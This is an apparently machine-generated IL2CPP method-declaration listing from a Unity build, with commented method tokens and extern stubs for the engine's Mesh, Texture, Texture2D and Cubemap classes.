// 0x00000283 T[] UnityEngine.Mesh::GetAllocArrayFromChannel(UnityEngine.Rendering.VertexAttribute)
// 0x00000284 System.Void UnityEngine.Mesh::SetSizedArrayForChannel(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.Array,System.Int32,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetSizedArrayForChannel_mBF8A0B7A6E58552C4142CD22FF31E7A0E125EC93 (void);
// 0x00000285 System.Void UnityEngine.Mesh::SetSizedNativeArrayForChannel(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.IntPtr,System.Int32,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetSizedNativeArrayForChannel_m6571CA632A3B7D9F2D110B5F76D47652A8B81372 (void);
// 0x00000286 System.Void UnityEngine.Mesh::SetArrayForChannel(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,T[],UnityEngine.Rendering.MeshUpdateFlags)
// 0x00000287 System.Void UnityEngine.Mesh::SetArrayForChannel(UnityEngine.Rendering.VertexAttribute,T[],UnityEngine.Rendering.MeshUpdateFlags)
// 0x00000288 System.Void UnityEngine.Mesh::SetListForChannel(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.Collections.Generic.List`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x00000289 System.Void UnityEngine.Mesh::SetListForChannel(UnityEngine.Rendering.VertexAttribute,System.Collections.Generic.List`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x0000028A System.Void UnityEngine.Mesh::GetListForChannel(System.Collections.Generic.List`1<T>,System.Int32,UnityEngine.Rendering.VertexAttribute,System.Int32)
// 0x0000028B System.Void UnityEngine.Mesh::GetListForChannel(System.Collections.Generic.List`1<T>,System.Int32,UnityEngine.Rendering.VertexAttribute,System.Int32,UnityEngine.Rendering.VertexAttributeFormat)
// 0x0000028C UnityEngine.Vector3[] UnityEngine.Mesh::get_vertices()
extern void Mesh_get_vertices_mA3577F1B08EDDD54E26AEB3F8FFE4EC247D2ABB9 (void);
// 0x0000028D System.Void UnityEngine.Mesh::set_vertices(UnityEngine.Vector3[])
extern void Mesh_set_vertices_m5BB814D89E9ACA00DBF19F7D8E22CB73AC73FE5C (void);
// 0x0000028E UnityEngine.Vector3[] UnityEngine.Mesh::get_normals()
extern void Mesh_get_normals_m2B6B159B799E6E235EA651FCAB2E18EE5B18ED62 (void);
// 0x0000028F System.Void UnityEngine.Mesh::set_normals(UnityEngine.Vector3[])
extern void Mesh_set_normals_m85D73193C49211BE9FA135FF72D5749B16A4760B (void);
// 0x00000290 UnityEngine.Vector4[] UnityEngine.Mesh::get_tangents()
extern void Mesh_get_tangents_mEA6C7BF6A2B9A8BD0E9A62963E048F973878299E (void);
// 0x00000291 System.Void UnityEngine.Mesh::set_tangents(UnityEngine.Vector4[])
extern void Mesh_set_tangents_mF547B7E4F9C70FB7CD6168139180A70AD306169B (void);
// 0x00000292 System.Void UnityEngine.Mesh::set_uv(UnityEngine.Vector2[])
extern void Mesh_set_uv_m6ED9C50E0DA8166DD48AC40FD6C828B9AD2E9617 (void);
// 0x00000293 System.Void UnityEngine.Mesh::set_uv2(UnityEngine.Vector2[])
extern void Mesh_set_uv2_m37B442C04EBB029C0AD9545C54F95D9BDAD8E9B5 (void);
// 0x00000294 UnityEngine.Color32[] UnityEngine.Mesh::get_colors32()
extern void Mesh_get_colors32_mA230CB5687CDCCEA5527BD5A0640E9535CB640A2 (void);
// 0x00000295 System.Void UnityEngine.Mesh::set_colors32(UnityEngine.Color32[])
extern void Mesh_set_colors32_m0E4462B7A1D613E6FB15DD7584BCE5491C17820F (void);
// 0x00000296 System.Void UnityEngine.Mesh::SetVertices(System.Collections.Generic.List`1<UnityEngine.Vector3>)
extern void Mesh_SetVertices_mCE01139EEEC3D10B4A6CEA1749FD84DABC53599E (void);
// 0x00000297 System.Void UnityEngine.Mesh::SetVertices(System.Collections.Generic.List`1<UnityEngine.Vector3>,System.Int32,System.Int32)
extern void Mesh_SetVertices_m193FDA5D9CB31FDFEEEC4CF17C0524A255E74E2F (void);
// 0x00000298 System.Void UnityEngine.Mesh::SetVertices(System.Collections.Generic.List`1<UnityEngine.Vector3>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetVertices_m13AB485BDB6B8F740338B20075A3E1510A6F96FA (void);
// 0x00000299 System.Void UnityEngine.Mesh::SetVertices(Unity.Collections.NativeArray`1<T>)
// 0x0000029A System.Void UnityEngine.Mesh::SetVertices(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x0000029B System.Void UnityEngine.Mesh::SetVertices(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x0000029C System.Void UnityEngine.Mesh::SetNormals(System.Collections.Generic.List`1<UnityEngine.Vector3>)
extern void Mesh_SetNormals_mB4072A4D2600768FD62BC9CAAFF8C43955A4A365 (void);
// 0x0000029D System.Void UnityEngine.Mesh::SetNormals(System.Collections.Generic.List`1<UnityEngine.Vector3>,System.Int32,System.Int32)
extern void Mesh_SetNormals_m7EB9E43C0287E99F2140901EB9CE5A75728B1C29 (void);
// 0x0000029E System.Void UnityEngine.Mesh::SetNormals(System.Collections.Generic.List`1<UnityEngine.Vector3>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetNormals_m07608D2B5CA012B8B3502868EF6D4B4DF859DE51 (void);
// 0x0000029F System.Void UnityEngine.Mesh::SetNormals(Unity.Collections.NativeArray`1<T>)
// 0x000002A0 System.Void UnityEngine.Mesh::SetNormals(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x000002A1 System.Void UnityEngine.Mesh::SetNormals(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x000002A2 System.Void UnityEngine.Mesh::SetTangents(System.Collections.Generic.List`1<UnityEngine.Vector4>)
extern void Mesh_SetTangents_m0FAEBB1D9ACF3607640669AD70AD6BFACA9D3CBB (void);
// 0x000002A3 System.Void UnityEngine.Mesh::SetTangents(System.Collections.Generic.List`1<UnityEngine.Vector4>,System.Int32,System.Int32)
extern void Mesh_SetTangents_mAE30C8D38845CEC4002FE0938607CDE0D2358FBE (void);
// 0x000002A4 System.Void UnityEngine.Mesh::SetTangents(System.Collections.Generic.List`1<UnityEngine.Vector4>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetTangents_m87066124EB0091440267546DB9A27EC89BF6E21B (void);
// 0x000002A5 System.Void UnityEngine.Mesh::SetColors(System.Collections.Generic.List`1<UnityEngine.Color32>)
extern void Mesh_SetColors_m4D4920186213CCC1DA28CD3C7BDBD13F0D00541F (void);
// 0x000002A6 System.Void UnityEngine.Mesh::SetColors(System.Collections.Generic.List`1<UnityEngine.Color32>,System.Int32,System.Int32)
extern void Mesh_SetColors_mEF64AD954EACB5F5EFFD8DA6AEA7D80CD1233F37 (void);
// 0x000002A7 System.Void UnityEngine.Mesh::SetColors(System.Collections.Generic.List`1<UnityEngine.Color32>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetColors_m07FAA75430500D2B2384A4A8185311411C504DEA (void);
// 0x000002A8 System.Void UnityEngine.Mesh::SetUvsImpl(System.Int32,System.Int32,System.Collections.Generic.List`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x000002A9 System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector2>)
extern void Mesh_SetUVs_m5A7A6EC14A621579B7138F2EF9BECA60E880A8D7 (void);
// 0x000002AA System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector4>)
extern void Mesh_SetUVs_mA0EA40129409D956FF22FCF7E01E27382879E255 (void);
// 0x000002AB System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector2>,System.Int32,System.Int32)
extern void Mesh_SetUVs_m974B79ED0ABDD6F9F14588E7D2BF5C637044656A (void);
// 0x000002AC System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector2>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetUVs_mDA2109E69AB4210A3DA3A3EA0DE9F77F0C9A8040 (void);
// 0x000002AD System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector4>,System.Int32,System.Int32)
extern void Mesh_SetUVs_m69E3F4333E212B3CAA0EDFFF14A2835897079D35 (void);
// 0x000002AE System.Void UnityEngine.Mesh::SetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector4>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_SetUVs_m25164DB799B915ECE8AE94B4A1F844CE936844B9 (void);
// 0x000002AF System.Void UnityEngine.Mesh::SetUVs(System.Int32,Unity.Collections.NativeArray`1<T>)
// 0x000002B0 System.Void UnityEngine.Mesh::SetUVs(System.Int32,Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x000002B1 System.Void UnityEngine.Mesh::SetUVs(System.Int32,Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32,UnityEngine.Rendering.MeshUpdateFlags)
// 0x000002B2 System.Void UnityEngine.Mesh::GetUVsImpl(System.Int32,System.Collections.Generic.List`1<T>,System.Int32)
// 0x000002B3 System.Void UnityEngine.Mesh::GetUVs(System.Int32,System.Collections.Generic.List`1<UnityEngine.Vector4>)
extern void Mesh_GetUVs_m3FCD854132DA16719481B8D97DF335A0C7244344 (void);
// 0x000002B4 System.Void UnityEngine.Mesh::PrintErrorCantAccessIndices()
extern void Mesh_PrintErrorCantAccessIndices_mC2A8F7BBED09D4D6ABC265AFCC2979795C1ABF0C (void);
// 0x000002B5 System.Boolean UnityEngine.Mesh::CheckCanAccessSubmesh(System.Int32,System.Boolean)
extern void Mesh_CheckCanAccessSubmesh_m216B541BBC526DB8F0ADBC9210E440D6DF875283 (void);
// 0x000002B6 System.Boolean UnityEngine.Mesh::CheckCanAccessSubmeshTriangles(System.Int32)
extern void Mesh_CheckCanAccessSubmeshTriangles_m96B4AFC9B20344F39C936698D23FBA1DACCBA020 (void);
// 0x000002B7 System.Boolean UnityEngine.Mesh::CheckCanAccessSubmeshIndices(System.Int32)
extern void Mesh_CheckCanAccessSubmeshIndices_mB6659E6FDE4EFDECB233C194E4AC066F5FF60533 (void);
// 0x000002B8 System.Void UnityEngine.Mesh::set_triangles(System.Int32[])
extern void Mesh_set_triangles_m124405320579A8D92711BB5A124644963A26F60B (void);
// 0x000002B9 System.Int32[] UnityEngine.Mesh::GetIndices(System.Int32)
extern void Mesh_GetIndices_m112B85EF32EE3C446947CE6CBC1AF3D50FC18179 (void);
// 0x000002BA System.Int32[] UnityEngine.Mesh::GetIndices(System.Int32,System.Boolean)
extern void Mesh_GetIndices_mFF08708714AB105E1097F1C2065D2A1ACAC88183 (void);
// 0x000002BB System.Void UnityEngine.Mesh::CheckIndicesArrayRange(System.Int32,System.Int32,System.Int32)
extern void Mesh_CheckIndicesArrayRange_m0B8030BE6248E1E411D92E3255777E6E530527F4 (void);
// 0x000002BC System.Void UnityEngine.Mesh::SetTrianglesImpl(System.Int32,UnityEngine.Rendering.IndexFormat,System.Array,System.Int32,System.Int32,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetTrianglesImpl_m0B0B6FAC63A88C640C3AA9DD5F1748BE6B2A2EC2 (void);
// 0x000002BD System.Void UnityEngine.Mesh::SetTriangles(System.Collections.Generic.List`1<System.Int32>,System.Int32)
extern void Mesh_SetTriangles_mD495DA0B00DB0E60A2B7B500D644F4470C1D61DB (void);
// 0x000002BE System.Void UnityEngine.Mesh::SetTriangles(System.Collections.Generic.List`1<System.Int32>,System.Int32,System.Boolean)
extern void Mesh_SetTriangles_m7CED6F00BCE254F7F0D7AFEEDBBE2F7E637F678B (void);
// 0x000002BF System.Void UnityEngine.Mesh::SetTriangles(System.Collections.Generic.List`1<System.Int32>,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetTriangles_mD3AB650CCB405159EFDB9EC36AB21FF20213BFFB (void);
// 0x000002C0 System.Void UnityEngine.Mesh::SetTriangles(System.Collections.Generic.List`1<System.Int32>,System.Int32,System.Int32,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetTriangles_m0E33B0C08C74A076A4B79F031DA60629B6CD86BA (void);
// 0x000002C1 System.Void UnityEngine.Mesh::SetIndices(System.Int32[],UnityEngine.MeshTopology,System.Int32)
extern void Mesh_SetIndices_m2AE7ED76A6C77D218C37C011DDB948589FD45B97 (void);
// 0x000002C2 System.Void UnityEngine.Mesh::SetIndices(System.Int32[],UnityEngine.MeshTopology,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetIndices_mDEC5E818B31E1DDA51EC563C78918068EE5D1B95 (void);
// 0x000002C3 System.Void UnityEngine.Mesh::SetIndices(System.Int32[],System.Int32,System.Int32,UnityEngine.MeshTopology,System.Int32,System.Boolean,System.Int32)
extern void Mesh_SetIndices_m21AD9D32E3FDC67959D8AB75A91078AA5DA952F7 (void);
// 0x000002C4 System.Void UnityEngine.Mesh::SetIndices(Unity.Collections.NativeArray`1<T>,UnityEngine.MeshTopology,System.Int32,System.Boolean,System.Int32)
// 0x000002C5 System.Void UnityEngine.Mesh::SetIndices(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32,UnityEngine.MeshTopology,System.Int32,System.Boolean,System.Int32)
// 0x000002C6 System.Void UnityEngine.Mesh::Clear()
extern void Mesh_Clear_m0F95397EA143D31AD0B4D332E8C6FA25A7957BC0 (void);
// 0x000002C7 System.Void UnityEngine.Mesh::RecalculateBounds()
extern void Mesh_RecalculateBounds_mA9B293F57C6CD298AE2D2DB19061FC23B05AB90B (void);
// 0x000002C8 System.Void UnityEngine.Mesh::RecalculateNormals()
extern void Mesh_RecalculateNormals_m3AA2788914611444E030CA310E03E3CFE683902B (void);
// 0x000002C9 System.Void UnityEngine.Mesh::RecalculateBounds(UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_RecalculateBounds_mCCC67392C58860F92A9674D0816BCA2D1730F077 (void);
// 0x000002CA System.Void UnityEngine.Mesh::RecalculateNormals(UnityEngine.Rendering.MeshUpdateFlags)
extern void Mesh_RecalculateNormals_m3ACA6ECD9C48FE1C7BA497EB23519DD4EC21DCED (void);
// 0x000002CB System.Void UnityEngine.Mesh::MarkDynamic()
extern void Mesh_MarkDynamic_m718089940F240AFE625D6DC9DA4E6F20229CC322 (void);
// 0x000002CC System.Void UnityEngine.Mesh::get_bounds_Injected(UnityEngine.Bounds&)
extern void Mesh_get_bounds_Injected_mE40C051E4181E7F70DB928CEA13A3A31DC9C29F7 (void);
// 0x000002CD System.Void UnityEngine.Mesh::set_bounds_Injected(UnityEngine.Bounds&)
extern void Mesh_set_bounds_Injected_m13D417C394E27CE4A14DF253F8DD435677FC2835 (void);
// 0x000002CE System.Void UnityEngine.Texture::.ctor()
extern void Texture__ctor_mC0C7974BEBD867CEB281409FEA15A78CD91B19CC (void);
// 0x000002CF System.Int32 UnityEngine.Texture::GetDataWidth()
extern void Texture_GetDataWidth_m9D5166D12895E4E905ED072D611DF6A834C232BC (void);
// 0x000002D0 System.Int32 UnityEngine.Texture::GetDataHeight()
extern void Texture_GetDataHeight_m37C3DE842FB101FD509904A0D76593F970B34995 (void);
// 0x000002D1 System.Int32 UnityEngine.Texture::get_width()
extern void Texture_get_width_m9569A27BA478BC380EBF83A53429F0E66E429108 (void);
// 0x000002D2 System.Void UnityEngine.Texture::set_width(System.Int32)
extern void Texture_set_width_m309DEA6AA9203B160624755C5D9EA75AB08AD6AE (void);
// 0x000002D3 System.Int32 UnityEngine.Texture::get_height()
extern void Texture_get_height_mE95D093681C11FD77191F51843F6615605A87258 (void);
// 0x000002D4 System.Void UnityEngine.Texture::set_height(System.Int32)
extern void Texture_set_height_m2A62EC27DC1F0AE6A952B2B65FF7BF68710CDF36 (void);
// 0x000002D5 System.Boolean UnityEngine.Texture::get_isReadable()
extern void Texture_get_isReadable_m6268EDAFF304287D8754EC0F115377722A316139 (void);
// 0x000002D6 UnityEngine.TextureWrapMode UnityEngine.Texture::get_wrapMode()
extern void Texture_get_wrapMode_m1DE1C2813B72EDCCCEB396CFC91989358E8C3AD0 (void);
// 0x000002D7 System.Void UnityEngine.Texture::set_wrapMode(UnityEngine.TextureWrapMode)
extern void Texture_set_wrapMode_m1F74A690E3883EC9C5C371D502D09642F15D0F7E (void);
// 0x000002D8 UnityEngine.FilterMode UnityEngine.Texture::get_filterMode()
extern void Texture_get_filterMode_mFEF0AEA29E8468450EF85533965DCEBE66D02A45 (void);
// 0x000002D9 System.Void UnityEngine.Texture::set_filterMode(UnityEngine.FilterMode)
extern void Texture_set_filterMode_mE423E58C0C16D059EA62BA87AD70F44AEA50CCC9 (void);
// 0x000002DA UnityEngine.Vector2 UnityEngine.Texture::get_texelSize()
extern void Texture_get_texelSize_m05CA60DE53EF7CD5D2CBFA68B69B764E4D463359 (void);
// 0x000002DB System.Int32 UnityEngine.Texture::Internal_GetActiveTextureColorSpace()
extern void Texture_Internal_GetActiveTextureColorSpace_m2F9F2D07316E0B52679BA943369AFBF7C292949B (void);
// 0x000002DC UnityEngine.ColorSpace UnityEngine.Texture::get_activeTextureColorSpace()
extern void Texture_get_activeTextureColorSpace_m286856BA92961FD58FE181C8DDC417EC0572643C (void);
// 0x000002DD System.Boolean UnityEngine.Texture::ValidateFormat(UnityEngine.TextureFormat)
extern void Texture_ValidateFormat_m5E00A267F1E4805EFCE6F6ACE707518221589596 (void);
// 0x000002DE System.Boolean UnityEngine.Texture::ValidateFormat(UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.FormatUsage)
extern void Texture_ValidateFormat_m1BC113E81713CBAF60BCA4D022ACC0C6B239E740 (void);
// 0x000002DF UnityEngine.UnityException UnityEngine.Texture::CreateNonReadableException(UnityEngine.Texture)
extern void Texture_CreateNonReadableException_m29786CD930E89C281564A9B341FD4088FBC8C94F (void);
// 0x000002E0 System.Void UnityEngine.Texture::.cctor()
extern void Texture__cctor_m58E82606B5D16BB7EEEC4BFAD112C1B1F95100FE (void);
// 0x000002E1 System.Void UnityEngine.Texture::get_texelSize_Injected(UnityEngine.Vector2&)
extern void Texture_get_texelSize_Injected_m9AD407D56C4BDA37E028DAEDC0D787332BCFDD18 (void);
// 0x000002E2 UnityEngine.TextureFormat UnityEngine.Texture2D::get_format()
extern void Texture2D_get_format_mE39DD922F83CA1097383309278BB6F20636A7D9D (void);
// 0x000002E3 UnityEngine.Texture2D UnityEngine.Texture2D::get_whiteTexture()
extern void Texture2D_get_whiteTexture_m7999084E0B635CF834F8DD2D840FAA71720404DA (void);
// 0x000002E4 System.Boolean UnityEngine.Texture2D::Internal_CreateImpl(UnityEngine.Texture2D,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Texture2D_Internal_CreateImpl_m24B85EC48FF8951247911008AE5AF27305970AD9 (void);
// 0x000002E5 System.Void UnityEngine.Texture2D::Internal_Create(UnityEngine.Texture2D,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Texture2D_Internal_Create_mD2E459ED24618FAE9C372D6B3A0D18A8E4633C51 (void);
// 0x000002E6 System.Boolean UnityEngine.Texture2D::get_isReadable()
extern void Texture2D_get_isReadable_m61A2BCE2B901DF11A910F5F8E93A72D4FD091B84 (void);
// 0x000002E7 System.Void UnityEngine.Texture2D::ApplyImpl(System.Boolean,System.Boolean)
extern void Texture2D_ApplyImpl_mF4AA09D491BDA81E4A3B3BA21157436CFEC39DAA (void);
// 0x000002E8 System.Boolean UnityEngine.Texture2D::ReinitializeImpl(System.Int32,System.Int32)
extern void Texture2D_ReinitializeImpl_m4C524C33B85EDD5FD09CAF2FA2F922FFA8BE366C (void);
// 0x000002E9 System.Void UnityEngine.Texture2D::SetPixelImpl(System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Color)
extern void Texture2D_SetPixelImpl_m9B08AB57ACD44485ECC3728BD3DE39F5E80A64AA (void);
// 0x000002EA UnityEngine.Color UnityEngine.Texture2D::GetPixelBilinearImpl(System.Int32,System.Int32,System.Single,System.Single)
extern void Texture2D_GetPixelBilinearImpl_m1BD6DEFD90A950A3A1A235ED641F4B20F5433C8B (void);
// 0x000002EB System.Boolean UnityEngine.Texture2D::ReinitializeWithFormatImpl(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,System.Boolean)
extern void Texture2D_ReinitializeWithFormatImpl_mF71459B3B010311D7BE7FA76611F56323107D327 (void);
// 0x000002EC System.IntPtr UnityEngine.Texture2D::GetWritableImageData(System.Int32)
extern void Texture2D_GetWritableImageData_m8E26026A332040F8713E5A2A13C5545797159A5E (void);
// 0x000002ED System.Int64 UnityEngine.Texture2D::GetRawImageDataSize()
extern void Texture2D_GetRawImageDataSize_m690AA2A7E6B0A207BC6DCA00A6313C3407CE3418 (void);
// 0x000002EE System.Void UnityEngine.Texture2D::UpdateExternalTexture(System.IntPtr)
extern void Texture2D_UpdateExternalTexture_m73D80FDE0859F0E36D320A69317E04A3A2AD9986 (void);
// 0x000002EF System.Void UnityEngine.Texture2D::SetAllPixels32(UnityEngine.Color32[],System.Int32)
extern void Texture2D_SetAllPixels32_m3B35E8F24EAE2368148524647EA47BC731A7A07A (void);
// 0x000002F0 System.Boolean UnityEngine.Texture2D::ValidateFormat(UnityEngine.TextureFormat,System.Int32,System.Int32)
extern void Texture2D_ValidateFormat_mD70A9FEEADE89325F05E3650404D8815EE9871F4 (void);
// 0x000002F1 System.Void UnityEngine.Texture2D::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32,System.Boolean,System.IntPtr)
extern void Texture2D__ctor_m20EA968E1968A169CC798DB95BC7FA1634F422B5 (void);
// 0x000002F2 System.Void UnityEngine.Texture2D::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32,System.Boolean)
extern void Texture2D__ctor_mB1445796B2A76B3D867B2603205F513AF494B9F3 (void);
// 0x000002F3 System.Void UnityEngine.Texture2D::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Texture2D__ctor_mECF60A9EC0638EC353C02C8E99B6B465D23BE917 (void);
// 0x000002F4 System.Void UnityEngine.Texture2D::.ctor(System.Int32,System.Int32)
extern void Texture2D__ctor_m3BA82E87442B7F69E118477069AE11101B9DF796 (void);
// 0x000002F5 UnityEngine.Texture2D UnityEngine.Texture2D::CreateExternalTexture(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean,System.Boolean,System.IntPtr)
extern void Texture2D_CreateExternalTexture_mE565291082917E99C26424734E284C00F295490B (void);
// 0x000002F6 System.Void UnityEngine.Texture2D::SetPixel(System.Int32,System.Int32,UnityEngine.Color)
extern void Texture2D_SetPixel_m2CCFC5F729135D59DC4A697C2605A3FC5C8574DB (void);
// 0x000002F7 UnityEngine.Color UnityEngine.Texture2D::GetPixelBilinear(System.Single,System.Single)
extern void Texture2D_GetPixelBilinear_m6AE4AF4FD181C478DF0F2C5C329F22A263ABFF5C (void);
// 0x000002F8 Unity.Collections.NativeArray`1<T> UnityEngine.Texture2D::GetRawTextureData()
// 0x000002F9 System.Void UnityEngine.Texture2D::Apply(System.Boolean,System.Boolean)
extern void Texture2D_Apply_m36EE27E6F1BF7FB8C70A1D749DC4EE249810AA3A (void);
// 0x000002FA System.Void UnityEngine.Texture2D::Apply()
extern void Texture2D_Apply_mA014182C9EE0BBF6EEE3B286854F29E50EB972DC (void);
// 0x000002FB System.Boolean UnityEngine.Texture2D::Reinitialize(System.Int32,System.Int32)
extern void Texture2D_Reinitialize_m9AB4169DA359C18BB4102F8E00C4321B53714E6B (void);
// 0x000002FC System.Boolean UnityEngine.Texture2D::Reinitialize(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Texture2D_Reinitialize_mE7FBFD2EEF3BE3135269959DBBE253A2B79A82DF (void);
// 0x000002FD System.Boolean UnityEngine.Texture2D::Resize(System.Int32,System.Int32)
extern void Texture2D_Resize_m6A784927A609BAE045AFCF77886AEEE72D19FB90 (void);
// 0x000002FE System.Boolean UnityEngine.Texture2D::Resize(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Texture2D_Resize_m80C2555F96D9952F9C3B57C53B231A64F3DBA605 (void);
// 0x000002FF System.Void UnityEngine.Texture2D::SetPixels32(UnityEngine.Color32[],System.Int32)
extern void Texture2D_SetPixels32_m436DA034F0483F6527B7C4B74744A02ABE2EA276 (void);
// 0x00000300 System.Void UnityEngine.Texture2D::SetPixels32(UnityEngine.Color32[])
extern void Texture2D_SetPixels32_m169F9873A21FB8DECA24DC1B8F06FB23D13BEE2A (void);
// 0x00000301 System.Void UnityEngine.Texture2D::SetPixelImpl_Injected(System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Color&)
extern void Texture2D_SetPixelImpl_Injected_m6B877CD888C30B122813AB3FDB853E336DBCBDE0 (void);
// 0x00000302 System.Void UnityEngine.Texture2D::GetPixelBilinearImpl_Injected(System.Int32,System.Int32,System.Single,System.Single,UnityEngine.Color&)
extern void Texture2D_GetPixelBilinearImpl_Injected_m609C33C58A1944B31C61309F71B459DA3AD99F07 (void);
// 0x00000303 System.Boolean UnityEngine.Cubemap::Internal_CreateImpl(UnityEngine.Cubemap,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Cubemap_Internal_CreateImpl_m18A09A1641EA5C3C36C8F26C57AE09BF0AE7BFAA (void);
// 0x00000304 System.Void UnityEngine.Cubemap::Internal_Create(UnityEngine.Cubemap,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Cubemap_Internal_Create_m43796004F7479E41B1C400786370A8D2C501FA6E (void);
// 0x00000305 System.Void UnityEngine.Cubemap::UpdateExternalTexture(System.IntPtr)
extern void Cubemap_UpdateExternalTexture_m6065B8D7B4B70C31AAA64DD142B96ADFAD74C53E (void);
// 0x00000306 System.Boolean UnityEngine.Cubemap::get_isReadable()
extern void Cubemap_get_isReadable_m66D87D825AE04E10C23B74E93E0111E87AF7478C (void);
// 0x00000307 System.Boolean UnityEngine.Cubemap::ValidateFormat(UnityEngine.TextureFormat,System.Int32)
extern void Cubemap_ValidateFormat_m60822B130F11C0593CF08E9C6145277C30EF0394 (void);
// 0x00000308 System.Boolean UnityEngine.Cubemap::ValidateFormat(UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32)
extern void Cubemap_ValidateFormat_m73C8D32EC70CA5CFB8AF951C1E4D8C92A757ACDD (void);
// 0x00000309 System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.Experimental.Rendering.DefaultFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Cubemap__ctor_m3359CE12114733CB661B308AB0F73F65B14F4758 (void);
// 0x0000030A System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Cubemap__ctor_m3821285A2DC0E20113E2BEAE3F16C9AF925FE14B (void);
// 0x0000030B System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.TextureFormat,System.Int32)
extern void Cubemap__ctor_m4C0C7AD2F162CF6D98856430F3C2A41CE57123E5 (void);
// 0x0000030C System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.Int32)
extern void Cubemap__ctor_m395695939CC8AE11ABC2EBEE0731AA09B9780DB3 (void);
// 0x0000030D System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.TextureFormat,System.Int32,System.IntPtr)
extern void Cubemap__ctor_mB83680A805288E50B7D0715A94CBF24495E240F7 (void);
// 0x0000030E System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.TextureFormat,System.Boolean,System.IntPtr)
extern void Cubemap__ctor_mD5E735B11F069D78C5AF0BE1DD36291A8F49785A (void);
// 0x0000030F System.Void UnityEngine.Cubemap::.ctor(System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Cubemap__ctor_m7FAD821CFD73DA99987C1FEBA363BB2FBF84C034 (void);
// 0x00000310 UnityEngine.Cubemap UnityEngine.Cubemap::CreateExternalTexture(System.Int32,UnityEngine.TextureFormat,System.Boolean,System.IntPtr)
extern void Cubemap_CreateExternalTexture_mF319F476EA734482687F9807DCDEFE8A5D92CB25 (void);
// 0x00000311 System.Void UnityEngine.Cubemap::ValidateIsNotCrunched(UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Cubemap_ValidateIsNotCrunched_m997EEF21323A149D2CE892BB9DA91B228B0CA581 (void);
